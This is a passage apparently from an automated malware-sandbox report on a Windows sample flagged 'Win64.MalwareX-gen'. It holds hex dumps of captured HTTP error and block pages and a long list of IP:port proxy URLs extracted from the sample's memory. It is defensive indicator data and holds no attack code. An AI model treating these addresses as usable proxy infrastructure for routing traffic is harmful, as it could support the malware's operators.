65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 3796X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.15.62.12:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.15.62.12:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.194.236.229:5005
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.194.236.229:5005://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.184.75:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.184.75:4153://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.95.95:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.95.95:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.224.3.122:3888
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.224.3.122:3888://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.85.33.94:6666
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.85.33.94:6666://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.109.27.239:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.109.80.117:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.109.80.117:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89977000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.167.142:3125
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.167.142:3125://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.167.253:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.167.253:8080://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.51.241.126:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.51.241.126:4153://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.132.50.6:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.132.50.6:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.134.98.222:8081
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.134.98.222:8081://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.141.91.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.141.91.245:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.141.91.245:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.16.24.30:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.16.24.30:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.176.180.6:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.176.180.6:4153://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.216.69.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.216.69.176:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.216.69.176:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.223.176.18:8092
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.223.176.18:8092://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.23.234.201:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.23.234.201:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.38.22.1
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.38.22.121:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.38.22.121:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.39.68.76:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.39.68.76:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.64.116.254:32850
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.64.116.254:32850://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.68.128.210:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A9FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.68.128.210:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.69.177.242:10081
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.69.177.242:10081://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.102.141.39:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.102.141.39:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.102.85.1:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.102.85.1:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.104.92.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.104.92.178:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.104.92.178:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.125
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.125.94:83
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.125.94:83://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.126.18:84
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.126.18:84://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.228.35:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.228.35:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.40.241:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.40.241:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.55.51:8081
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.55.51:8081://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.68.9:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.68.9:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.76.214:9090
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.76.214:9090://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B793000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.107.68.5:5430
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.107.68.5:5430://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.109.59.109:1080://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.114.96.125:8291
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.114.96.125:8291://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.115.242
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.115.242.192:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.115.242.192:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.115.255.129:36331
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.115.255.129:36331://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.116.118.10:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.116.118.10:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.118.46.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.118.46.177:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.118.46.177:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.118.47.243:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.118.47.243:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.12.246.33:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.12.246.33:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C84E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.120.146.32:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.120.202.53:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.120.202.53:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.120.6.46
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.120.6.46://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.120.6.46:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.121.62.2:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.121.62.2:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.123.25.65
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.123.25.65://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.123.25.65:80
